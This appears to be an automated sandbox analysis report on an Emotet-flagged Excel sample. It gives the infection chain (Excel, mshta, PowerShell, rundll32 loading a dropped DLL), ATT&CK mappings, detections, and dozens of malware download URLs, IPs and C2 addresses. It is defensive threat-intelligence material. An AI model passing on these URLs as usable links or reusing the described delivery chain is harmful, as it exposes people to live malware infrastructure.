                            Source: Yara matchFile source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer122
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials2
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562524 Sample: 2022-28-01_1202.xls Startdate: 29/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 43 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\2022-28-01_1202.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49165, 49166, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States 23->57 59 jurnalpjf.lan.go.id 103.206.244.105, 49168, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\SysWOW64\...\kkeql.uvv (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            2022-28-01_1202.xls12%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\JooSee.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            15.2.rundll32.exe.380000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.340000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.a50000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.3f0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.430000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.180000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e90000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2960000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.22e0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.310000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.250000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2270000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2df0000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.990000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.30c0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2f90000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2b10000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.960000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.420000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.270000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.3c0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3c0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2b40000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.23b0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.c60000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.cc0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.460000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2ea0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2e30000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2490000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e00000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2380000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.240000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.520000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.370000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.27d0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.29f0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3120000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2290000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.390000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2e70000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2e20000.18.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.370000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2260000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.700000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.140000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.210000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2c40000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.22e0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2a20000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2ab0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2ee0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2d20000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.30f0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3130000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.400000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.c90000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2f30000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.4b0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.3a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.920000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2ae0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2860000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.370000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.3100000.12.unpack100%AviraHEUR/AGEN.1145233Download File

                            Domains

                            SourceDetectionScannerLabelLink
                            hostfeeling.com11%VirustotalBrowse
                            jurnalpjf.lan.go.id1%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://maxtdeveloper.com/okw9yx/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/13%VirustotalBrowse
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html4100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/PE3100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/f100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/97v/100%Avira URL Cloudmalware
                            https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih0%Avira URL Cloudsafe
                            http://91.240.110%URL Reputationsafe
                            http://91.240.118.172/gg/ff/fe.png100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.pngPE3100%Avira URL Cloudmalware
                            http://jurnalpjf.lan.go.id/asset0%Avira URL Cloudsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-adm100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/100%Avira URL Cloudmalware
                            http://hostfeeling.com100%Avira URL Cloudmalware
                            https://160.16.102.168/r0%Avira URL Cloudsafe
                            http://daisy.sukoburu-secure.com100%Avira URL Cloudmalware
                            http://it-o.biz/100%Avira URL Cloudmalware
                            http://jurnalpjf.lan.go.id/assets/iM/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp0%Avira URL Cloudsafe
                            http://daisy.suk0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlv100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlngs100%Avira URL Cloudmalware
                            https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih;0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlmshta100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlWinSta0100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/97v/PE3100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/9100%Avira URL Cloudmalware
                            http://91.240.118.172100%Avira URL Cloudmalware
                            https://160.16.102.168/0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id0%Avira URL Cloudsafe
                            http://www.protware.com0%URL Reputationsafe
                            http://activetraining.sytes.net/libraries/8s/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlfunction100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio0%Avira URL Cloudsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlY100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/libraries/8s/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.p100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-cont100%Avira URL Cloudmalware
                            http://jurnalpjf.lan.go.id/assets/iM/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlB100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlK100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hostfeeling.com
                            		164.90.147.135
                            		truetrueunknown
                            jurnalpjf.lan.go.id
                            		103.206.244.105
                            		truefalseunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://91.240.118.172/gg/ff/fe.pngtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://jurnalpjf.lan.go.id/assets/iM/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmltrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://maxtdeveloper.com/okw9yx/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • 13%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.html4mshta.exe, 00000004.00000003.411734628.000000000025F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/bitrix/xoDdDe/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.com/wp-admin/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://property-eg.com/mlzkir/97v/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAihrundll32.exe, 00000011.00000002.667057361.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.11powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		low
                            http://91.240.118.172/gg/ff/fe.pngPE3powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://jurnalpjf.lan.go.id/assetpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://bimesarayenovin.ir/wp-admpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.htmlmshta.exe, 00000004.00000003.413134769.0000000002A45000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.compowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://160.16.102.168/rrundll32.exe, 00000011.00000002.667077231.0000000000799000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://daisy.sukoburu-secure.compowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://activetraining.sytes.net/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://gudangtasorichina.com/wp-content/GG01c/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://gudangtasorichina.com/wppowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://daisy.sukpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlvmshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlngsmshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih;rundll32.exe, 00000011.00000002.667109716.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlmshtamshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlWinSta0mshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://property-eg.com/mlzkir/97v/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://property-eg.com/mlzkir/9powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://160.16.102.168/rundll32.exe, 00000011.00000002.666782333.00000000001DD000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.667122057.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://jurnalpjf.lan.go.idpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.protware.commshta.exe, 00000004.00000002.433703673.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://activetraining.sytes.net/libraries/8s/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlfunctionmshta.exe, 00000004.00000003.413147395.0000000002A4D000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://totalplaytuxtla.com/sitiopowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/bitrix/xoDdDe/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
